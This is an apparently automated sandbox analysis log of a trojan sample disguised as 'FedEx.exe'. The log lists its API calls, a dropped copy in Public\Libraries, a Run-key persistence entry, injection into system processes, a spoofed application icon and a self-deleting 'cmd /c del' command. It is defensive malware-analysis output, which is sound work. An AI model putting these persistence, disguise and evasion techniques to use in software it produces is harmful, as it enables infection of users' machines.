          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C022AE20_2_04C022AE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BEFA2B20_2_04BEFA2B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6EBB020_2_04B6EBB0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BE23E320_2_04BE23E3
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF03DA20_2_04BF03DA
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFDBD220_2_04BFDBD2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6ABD820_2_04B6ABD8
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5A30920_2_04B5A309
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C02B2820_2_04C02B28
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5AB4020_2_04B5AB40
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 051BB150 appears 35 times
          Source: C:\Windows\SysWOW64\logagent.exeCode function: String function: 04B3B150 appears 133 times
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_051F9910
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9540 NtReadFile,LdrInitializeThunk,8_2_051F9540
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F99A0 NtCreateSection,LdrInitializeThunk,8_2_051F99A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F95D0 NtClose,LdrInitializeThunk,8_2_051F95D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9840 NtDelayExecution,LdrInitializeThunk,8_2_051F9840
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_051F9860
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F98F0 NtReadVirtualMemory,LdrInitializeThunk,8_2_051F98F0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9710 NtQueryInformationToken,LdrInitializeThunk,8_2_051F9710
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9780 NtMapViewOfSection,LdrInitializeThunk,8_2_051F9780
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F97A0 NtUnmapViewOfSection,LdrInitializeThunk,8_2_051F97A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9FE0 NtCreateMutant,LdrInitializeThunk,8_2_051F9FE0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9A00 NtProtectVirtualMemory,LdrInitializeThunk,8_2_051F9A00
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9A20 NtResumeThread,LdrInitializeThunk,8_2_051F9A20
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9A50 NtCreateFile,LdrInitializeThunk,8_2_051F9A50
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_051F9660
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_051F96E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051FAD30 NtSetContextThread,8_2_051FAD30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9520 NtWaitForSingleObject,8_2_051F9520
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9950 NtQueueApcThread,8_2_051F9950
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9560 NtWriteFile,8_2_051F9560
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F99D0 NtCreateProcessEx,8_2_051F99D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F95F0 NtQueryInformationFile,8_2_051F95F0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9820 NtEnumerateKey,8_2_051F9820
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051FB040 NtSuspendThread,8_2_051FB040
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F98A0 NtWriteVirtualMemory,8_2_051F98A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051FA710 NtOpenProcessToken,8_2_051FA710
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9B00 NtSetValueKey,8_2_051F9B00
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9730 NtQueryVirtualMemory,8_2_051F9730
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9770 NtSetInformationFile,8_2_051F9770
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051FA770 NtOpenThread,8_2_051FA770
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9760 NtOpenProcess,8_2_051F9760
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051FA3B0 NtGetContextThread,8_2_051FA3B0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9610 NtEnumerateValueKey,8_2_051F9610
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9A10 NtQuerySection,8_2_051F9A10
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9650 NtQueryValueKey,8_2_051F9650
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9670 NtQueryInformationProcess,8_2_051F9670
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9A80 NtOpenDirectoryObject,8_2_051F9A80
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F96D0 NtCreateKey,8_2_051F96D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B795D0 NtClose,LdrInitializeThunk,20_2_04B795D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79540 NtReadFile,LdrInitializeThunk,20_2_04B79540
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_04B796E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79660 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_04B79660
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk,20_2_04B797A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79780 NtMapViewOfSection,LdrInitializeThunk,20_2_04B79780
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79FE0 NtCreateMutant,LdrInitializeThunk,20_2_04B79FE0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79710 NtQueryInformationToken,LdrInitializeThunk,20_2_04B79710
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B798F0 NtReadVirtualMemory,LdrInitializeThunk,20_2_04B798F0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk,20_2_04B79860
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79840 NtDelayExecution,LdrInitializeThunk,20_2_04B79840
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B799A0 NtCreateSection,LdrInitializeThunk,20_2_04B799A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_04B79910
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79A20 NtResumeThread,LdrInitializeThunk,20_2_04B79A20
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79A00 NtProtectVirtualMemory,LdrInitializeThunk,20_2_04B79A00
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79A50 NtCreateFile,LdrInitializeThunk,20_2_04B79A50
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B795F0 NtQueryInformationFile,20_2_04B795F0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B7AD30 NtSetContextThread,20_2_04B7AD30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79520 NtWaitForSingleObject,20_2_04B79520
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79560 NtWriteFile,20_2_04B79560
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B796D0 NtCreateKey,20_2_04B796D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79610 NtEnumerateValueKey,20_2_04B79610
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79670 NtQueryInformationProcess,20_2_04B79670
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79650 NtQueryValueKey,20_2_04B79650
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79730 NtQueryVirtualMemory,20_2_04B79730
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B7A710 NtOpenProcessToken,20_2_04B7A710
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B7A770 NtOpenThread,20_2_04B7A770
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79770 NtSetInformationFile,20_2_04B79770
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79760 NtOpenProcess,20_2_04B79760
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B798A0 NtWriteVirtualMemory,20_2_04B798A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79820 NtEnumerateKey,20_2_04B79820
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B7B040 NtSuspendThread,20_2_04B7B040
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B799D0 NtCreateProcessEx,20_2_04B799D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79950 NtQueueApcThread,20_2_04B79950
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79A80 NtOpenDirectoryObject,20_2_04B79A80
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79A10 NtQuerySection,20_2_04B79A10
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B7A3B0 NtGetContextThread,20_2_04B7A3B0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B79B00 NtSetValueKey,20_2_04B79B00
          Source: FedEx.exe, 00000000.00000003.424180107.000000007FD10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs FedEx.exe
          Source: FedEx.exe, 00000000.00000003.424293428.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs FedEx.exe
          Source: FedEx.exe, 00000000.00000003.424776287.0000000003580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs FedEx.exe
          Source: FedEx.exe, 00000000.00000000.422864741.00000000004DD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7z.exe, vs FedEx.exe
          Source: FedEx.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: FedEx.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Rvsuben.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Rvsuben.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: archiveint.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: archiveint.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: archiveint.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: archiveint.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: archiveint.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: archiveint.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeSection loaded: endpointdlp.dllJump to behavior
          Source: FedEx.exeVirustotal: Detection: 31%
          Source: FedEx.exeReversingLabs: Detection: 58%
          Source: C:\Users\user\Desktop\FedEx.exeFile read: C:\Users\user\Desktop\FedEx.exeJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\FedEx.exe "C:\Users\user\Desktop\FedEx.exe"
          Source: C:\Users\user\Desktop\FedEx.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Rvsuben.exe "C:\Users\Public\Libraries\Rvsuben.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Rvsuben.exe "C:\Users\Public\Libraries\Rvsuben.exe"
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Users\user\Desktop\FedEx.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Rvsuben.exe "C:\Users\Public\Libraries\Rvsuben.exe" Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"Jump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Rvsubentohcvaxlbphydsofhyldatal[1]Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@17/6@7/2
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
          Source: C:\Users\user\Desktop\FedEx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: WWAHost.pdb source: logagent.exe, 00000008.00000002.624050662.0000000005070000.00000040.10000000.00040000.00000000.sdmp, logagent.exe, 00000008.00000003.619739649.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.618801358.0000000005078000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: logagent.exe, 00000008.00000002.624050662.0000000005070000.00000040.10000000.00040000.00000000.sdmp, logagent.exe, 00000008.00000003.619739649.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.618801358.0000000005078000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.482099015.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.480246797.0000000004E62000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: logagent.exe
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03541F02 push ss; ret 0_3_03541F14
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03541EDD push ecx; ret 0_3_03541EF7
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035426FE pushfd ; ret 0_3_035426FF
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03542136 push ss; ret 0_3_03542150
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035429D6 push esi; retf 0_3_035429D8
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035435C6 push ecx; ret 0_3_035435C7
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035425C0 pushfd ; ret 0_3_035425C1
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035439EE push es; ret 0_3_035439EF
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_0354219A pushfd ; ret 0_3_0354219B
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03541C36 pushfd ; ret 0_3_03541C37
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035404D1 push ss; ret 0_3_035404E9
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035424DE pushfd ; ret 0_3_035424DF
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035404C5 push ss; ret 0_3_035404B7
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035428EB pushfd ; ret 0_3_035428EC
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_0354109D pushfd ; ret 0_3_0354109E
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03545C86 push ebx; ret 0_3_03545C8C
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_0354048C push ss; ret 0_3_035404B7
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035404B8 push ebx; ret 0_3_035404C4
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_035420A6 pushfd ; ret 0_3_035420A7
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_038D5384 push 0041C3A0h; ret 0_3_038D53A8
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03883B86 push ss; ret 0_3_03883BA0
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_038D43A8 push 0041B428h; ret 0_3_038D4430
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_038D53DC push 0041C3F8h; ret 0_3_038D5400
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03883BEA pushfd ; ret 0_3_03883BEB
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03881F08 push ebx; ret 0_3_03881F14
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_038D5314 push 0041C330h; ret 0_3_038D5338
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03881F15 push ss; ret 0_3_03881F07
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03883F2E pushfd ; ret 0_3_03883F2F
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03881F21 push ss; ret 0_3_03881F39
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_0388433B pushfd ; ret 0_3_0388433C
          Source: C:\Users\user\Desktop\FedEx.exeCode function: 0_3_03883686 pushfd ; ret 0_3_03883687
          Source: C:\Users\user\Desktop\FedEx.exeFile created: C:\Users\Public\Libraries\Rvsuben.exeJump to dropped file
          Source: C:\Users\user\Desktop\FedEx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RvsubenJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run RvsubenJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon1488.png
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
